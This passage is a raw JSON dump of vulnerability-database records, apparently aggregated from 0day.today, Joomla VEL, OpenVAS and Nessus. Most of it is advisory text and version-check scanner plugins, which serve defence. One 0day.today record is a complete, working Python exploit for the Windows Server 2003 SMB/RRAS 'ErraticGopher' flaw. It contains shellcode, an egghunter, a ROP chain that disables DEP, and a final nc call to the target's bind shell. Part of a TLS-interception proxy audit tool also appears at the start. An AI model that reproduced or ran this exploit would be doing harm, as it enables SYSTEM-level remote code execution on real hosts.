[o.strip() for o in options.vectors.strip().split(\",\")]\r\n if 'ALL' in (v.upper() for v in options.vectors):\r\n options.vectors = all_vectors\r\n elif 'NONE' in (v.upper() for v in options.vectors):\r\n options.vectors = []\r\n Vectors._TLS_CERTFILE = Vectors._TLS_KEYFILE = options.key\r\n \r\n # ---- start up engines ----\r\n prx = ProxyServer(listen=options.listen, target=options.remote, \r\n buffer_size=options.buffer_size, delay=0.00001)\r\n logger.info(\"%s ready.\"%prx)\r\n rewrite = RewriteDispatcher(generic_tls_intercept=options.generic_tls_intercept)\r\n \r\n for classname in options.vectors:\r\n try:\r\n proto, vector = classname.split('.',1)\r\n cls_proto = getattr(globals().get(\"Vectors\"),proto)\r\n cls_vector = getattr(cls_proto, vector)\r\n rewrite.add(cls_proto._PROTO_ID, cls_vector)\r\n logger.debug(\"* added vector (port:%-5s, proto:%8s): %s\"%(cls_proto._PROTO_ID, proto, repr(cls_vector)))\r\n except Exception, e:\r\n logger.error(\"* error - failed to add: %s\"%classname)\r\n parser.error(\"invalid vector: %s\"%classname)\r\n \r\n logging.info(repr(rewrite))\r\n prx.set_callback(\"mangle_server_data\", rewrite.mangle_server_data)\r\n prx.set_callback(\"mangle_client_data\", rewrite.mangle_client_data)\r\n prx.set_callback(\"on_recv_peek\", rewrite.on_recv_peek)\r\n try:\r\n prx.main_loop()\r\n except KeyboardInterrupt:\r\n logger.warning( \"Ctrl C - Stopping server\")\r\n ret+=1\r\n \r\n logger.info(\" -- audit results --\")\r\n for client,resultlist in rewrite.get_results_by_clients().iteritems():\r\n logger.info(\"[*] client: %s\"%client)\r\n for mangle, result in resultlist:\r\n logger.info(\" [%-11s] %s\"%(\"Vulnerable!\" if result else \" \",repr(mangle)))\r\n \r\n sys.exit(ret)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/29438", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-19T07:09:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2017-04-26T00:00:00", "published": "2017-04-26T00:00:00", "href": "https://0day.today/exploit/description/27679", "id": "1337DAY-ID-27679", "type": "zdt", "title": "Microsoft Windows 2003 SP2 - SMB Remote Code Execution (ERRATICGOPHER) Exploit", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n##################################################################################\r\n# By Victor Portal (vportal) for educational porpouse only \r\n##################################################################################\r\n# This exploit is the python version of the ErraticGopher exploit probably #\r\n# with some modifications. ErraticGopher exploits a memory corruption #\r\n# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #\r\n# Because the Magic bytes, the application redirects the execution to the #\r\n# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy #\r\n# all te injected stub from the heap to the stack, overwritten a return #\r\n# address as well as the SEH handler stored in the Stack, being possible # \r\n# to control the execution flow to disable DEP and jump to the shellcode #\r\n# as SYSTEM user. #\r\n##################################################################################\r\n#The exploit only works if target has the RRAS service enabled\r\n#Tested on Windows Server 2003 SP2\r\n \r\nimport struct\r\nimport sys\r\nimport time\r\nimport os\r\n \r\nfrom threading import Thread \r\n \r\nfrom impacket import smb\r\nfrom impacket import uuid\r\nfrom impacket import dcerpc\r\nfrom impacket.dcerpc.v5 import transport\r\n \r\ntarget = sys.argv[1]\r\n \r\nprint '[-]Initiating connection'\r\ntrans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % target)\r\ntrans.connect()\r\n \r\nprint '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % target\r\ndce = trans.DCERPC_class(trans)\r\n#RRAS DCE-RPC CALL\r\ndce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))\r\n \r\negghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\"\r\negghunter += \"\\x74\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n \r\n#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b \"\\x00\" -f python\r\nbuf = \"\"\r\nbuf += \"\\xb8\\x3c\\xb1\\x1e\\x1d\\xd9\\xc8\\xd9\\x74\\x24\\xf4\\x5a\\x33\"\r\nbuf += \"\\xc9\\xb1\\x53\\x83\\xc2\\x04\\x31\\x42\\x0e\\x03\\x7e\\xbf\\xfc\"\r\nbuf += \"\\xe8\\x82\\x57\\x82\\x13\\x7a\\xa8\\xe3\\x9a\\x9f\\x99\\x23\\xf8\"\r\nbuf += \"\\xd4\\x8a\\x93\\x8a\\xb8\\x26\\x5f\\xde\\x28\\xbc\\x2d\\xf7\\x5f\"\r\nbuf += \"\\x75\\x9b\\x21\\x6e\\x86\\xb0\\x12\\xf1\\x04\\xcb\\x46\\xd1\\x35\"\r\nbuf += \"\\x04\\x9b\\x10\\x71\\x79\\x56\\x40\\x2a\\xf5\\xc5\\x74\\x5f\\x43\"\r\nbuf += \"\\xd6\\xff\\x13\\x45\\x5e\\x1c\\xe3\\x64\\x4f\\xb3\\x7f\\x3f\\x4f\"\r\nbuf += \"\\x32\\x53\\x4b\\xc6\\x2c\\xb0\\x76\\x90\\xc7\\x02\\x0c\\x23\\x01\"\r\nbuf += \"\\x5b\\xed\\x88\\x6c\\x53\\x1c\\xd0\\xa9\\x54\\xff\\xa7\\xc3\\xa6\"\r\nbuf += \"\\x82\\xbf\\x10\\xd4\\x58\\x35\\x82\\x7e\\x2a\\xed\\x6e\\x7e\\xff\"\r\nbuf += \"\\x68\\xe5\\x8c\\xb4\\xff\\xa1\\x90\\x4b\\xd3\\xda\\xad\\xc0\\xd2\"\r\nbuf += \"\\x0c\\x24\\x92\\xf0\\x88\\x6c\\x40\\x98\\x89\\xc8\\x27\\xa5\\xc9\"\r\nbuf += \"\\xb2\\x98\\x03\\x82\\x5f\\xcc\\x39\\xc9\\x37\\x21\\x70\\xf1\\xc7\"\r\nbuf += \"\\x2d\\x03\\x82\\xf5\\xf2\\xbf\\x0c\\xb6\\x7b\\x66\\xcb\\xb9\\x51\"\r\nbuf += \"\\xde\\x43\\x44\\x5a\\x1f\\x4a\\x83\\x0e\\x4f\\xe4\\x22\\x2f\\x04\"\r\nbuf += \"\\xf4\\xcb\\xfa\\xb1\\xfc\\x6a\\x55\\xa4\\x01\\xcc\\x05\\x68\\xa9\"\r\nbuf += \"\\xa5\\x4f\\x67\\x96\\xd6\\x6f\\xad\\xbf\\x7f\\x92\\x4e\\xae\\x23\"\r\nbuf += \"\\x1b\\xa8\\xba\\xcb\\x4d\\x62\\x52\\x2e\\xaa\\xbb\\xc5\\x51\\x98\"\r\nbuf += \"\\x93\\x61\\x19\\xca\\x24\\x8e\\x9a\\xd8\\x02\\x18\\x11\\x0f\\x97\"\r\nbuf += \"\\x39\\x26\\x1a\\xbf\\x2e\\xb1\\xd0\\x2e\\x1d\\x23\\xe4\\x7a\\xf5\"\r\nbuf += \"\\xc0\\x77\\xe1\\x05\\x8e\\x6b\\xbe\\x52\\xc7\\x5a\\xb7\\x36\\xf5\"\r\nbuf += \"\\xc5\\x61\\x24\\x04\\x93\\x4a\\xec\\xd3\\x60\\x54\\xed\\x96\\xdd\"\r\nbuf += \"\\x72\\xfd\\x6e\\xdd\\x3e\\xa9\\x3e\\x88\\xe8\\x07\\xf9\\x62\\x5b\"\r\nbuf += \"\\xf1\\x53\\xd8\\x35\\x95\\x22\\x12\\x86\\xe3\\x2a\\x7f\\x70\\x0b\"\r\nbuf += \"\\x9a\\xd6\\xc5\\x34\\x13\\xbf\\xc1\\x4d\\x49\\x5f\\x2d\\x84\\xc9\"\r\nbuf += \"\\x6f\\x64\\x84\\x78\\xf8\\x21\\x5d\\x39\\x65\\xd2\\x88\\x7e\\x90\"\r\nbuf += \"\\x51\\x38\\xff\\x67\\x49\\x49\\xfa\\x2c\\xcd\\xa2\\x76\\x3c\\xb8\"\r\nbuf += \"\\xc4\\x25\\x3d\\xe9\"\r\n \r\n#NX disable routine for Windows Server 2003 SP2\r\nrop = \"\\x30\\xdb\\xc0\\x71\" #push esp, pop ebp, retn ws_32.dll\r\nrop += \"\\x45\"*16\r\nrop += \"\\xe9\\x77\\xc1\\x77\" #push esp, pop ebp, retn 4 gdi32.dll\r\nrop += \"\\x5d\\x7a\\x81\\x7c\" #ret 20\r\nrop += \"\\x71\\x42\\x38\\x77\" #jmp esp\r\nrop += \"\\xf6\\xe7\\xbd\\x77\" #add esp,2c ; retn msvcrt.dll\r\nrop += \"\\x90\"*2 + egghunter + \"\\x90\"*42\r\nrop += \"\\x17\\xf5\\x83\\x7c\" #Disable NX routine\r\nrop += \"\\x90\"*4\r\n \r\nstub = \"\\x21\\x00\\x00\\x00\\x10\\x27\\x00\\x00\\x30\\x07\\x00\\x00\\x00\\x40\\x51\\x06\\x04\\x00\\x00\\x00\\x00\\x85\\x57\\x01\\x30\\x07\\x00\\x00\\x08\\x00\\x00\\x00\" #Magic bytes\r\nstub += \"\\x41\"*20 + rop + \"\\xCC\"*100 + \"w00tw00t\" + buf + \"\\x42\"*(1313-20-len(rop)-100-8-len(buf))\r\nstub += \"\\x12\" #Magic byte\r\nstub += \"\\x46\"*522\r\nstub += \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" #Magic bytes\r\n \r\n \r\ndce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)\r\nprint \"[-]Exploit sent to target successfully...\"\r\n \r\nprint \"Waiting for shell...\"\r\ntime.sleep(5)\r\nos.system(\"nc \" + target + \" 4444\")\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/27679", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2018-09-18T08:40:47", "bulletinFamily": "software", "description": "SquadManagement by Lars Hildebrandt, versions 1.0.3 and previous, SQL Injection\n", "modified": "2018-03-07T11:05:51", "published": "2018-03-07T00:00:00", "id": "JVEL:593", "href": "https://vel.joomla.org/vel-blog/2119", "type": "joomla", "title": "SquadManagement,1.0.3,SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-03-19T12:27:17", "bulletinFamily": "scanner", "description": "It was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.", "modified": "2019-03-18T00:00:00", "published": "2018-01-12T00:00:00", "id": "OPENVAS:1361412562310890871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890871", "title": "Debian LTS Advisory ([SECURITY] [DLA 871-1] python3.2 security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_871.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 871-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890871\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2016-0772\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 871-1] python3.2 security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-12 00:00:00 +0100 (Fri, 12 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00029.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"python3.2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', this issue has been fixed in python3.2 version\n3.2.3-7+deb7u1.\n\nWe recommend that you upgrade your python3.2 packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that there was a TLS stripping vulnerability in the smptlib\nlibrary distributed with the CPython interpreter.\n\nThe library did not return an error if StartTLS failed, which might have\nallowed man-in-the-middle attackers to bypass the TLS protections by leveraging\na network position to block the StartTLS command.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"idle-python3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libpython3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-dbg\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-dev\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-doc\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-examples\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-7+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-26T14:36:27", "bulletinFamily": "scanner", "description": "Splunk Light is prone to multiple vulnerabilities in Python.", "modified": "2018-10-26T00:00:00", "published": "2017-01-24T00:00:00", "id": "OPENVAS:1361412562310106540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106540", "title": "Splunk Light Python Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_splunk_light_python_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Splunk Light Python Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:splunk:light';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106540\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-24 10:40:31 +0700 (Tue, 24 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5636\", \"CVE-2016-5699\", \"CVE-2016-0772\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Splunk Light Python Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_splunk_light_detect.nasl\");\n script_mandatory_keys(\"SplunkLight/installed\");\n\n script_tag(name:\"summary\", value:\"Splunk Light is prone to multiple vulnerabilities in Python.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Splunk Light is prone to multiple vulnerabilities in Python:\n\n - Integer overflow in the get_data function in zipimport.c in Python allows remote attackers to have unspecified\nimpact via a negative data size value, which triggers a heap-based buffer overflow. (CVE-2016-5636)\n\n - CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in Python allows\nremote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL. (CVE-2016-5699)\n\n - The smtplib library in Python does not return an error when StartTLS fails, which might allow man-in-the-middle\nattackers to bypass the TLS protections by leveraging a network position between the client and the registry to\nblock the StartTLS command, aka a 'StartTLS stripping attack'. (CVE-2016-0772)\");\n\n script_tag(name:\"affected\", value:\"Splunk Light prior to version 6.5.1\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.5.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.splunk.com/view/SP-CAAAPSR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"6.5.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.5.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:31:41", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4025337 or cumulative update 4025341. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the Windows Performance Monitor Console due to improper parsing of XML input that contains a reference to an external entity. An unauthenticated, remote attacker can exploit this, by convincing a user to create a Data Collector Set and import a specially crafted XML file, to disclose arbitrary files via an XML external entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows Explorer due to improper handling of executable files and shares during rename operations. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted file, to execute arbitrary code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft Windows when handling Kerberos ticket exchanges due to a failure to prevent tampering with the SNAME field. A man-in-the-middle attacker can exploit this to bypass the Extended Protection for Authentication security feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the Windows System Information Console due to improper parsing of XML input that contains a reference to an external entity. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted file, to disclose arbitrary files via an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in Windows due to Kerberos falling back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. An authenticated, remote attacker can exploit this, via an application that sends specially crafted traffic to a domain controller, to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to bypass Kernel Address Space Layout Randomization (KASLR) and disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in PowerShell when handling a PSObject that wraps a CIM instance. An authenticated, remote attacker can exploit this, via a specially crafted script, to execute arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics Component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the Microsoft Graphics Component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in Windows due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the HTTP.sys server application component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows Explorer that is triggered when Explorer attempts to open a non-existent file. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause a user's system to stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad due to improper parsing of specially crafted files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted file, to execute arbitrary code in the context of the current user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the Windows Search component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by sending specially crafted messages to the Windows Search service, to elevate privileges and execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the Windows Common Log File System (CLFS) driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass CORS redirect restrictions. (CVE-2017-8592)", "modified": "2018-08-03T00:00:00", "id": "SMB_NT_MS17_JUL_4025341.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101367", "published": "2017-07-11T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 July 2017 Security Updates", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101367);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99398,\n 99400,\n 99402,\n 99409,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025341\");\n script_xref(name:\"MSFT\", value:\"MS17-4025341\");\n script_xref(name:\"MSKB\", value:\"4025337\");\n script_xref(name:\"MSFT\", value:\"MS17-4025337\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025337\nor cumulative update 4025341. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of 